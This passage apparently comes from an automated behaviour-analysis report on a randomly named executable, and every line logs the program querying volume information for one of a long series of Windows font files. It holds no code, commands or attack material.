Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
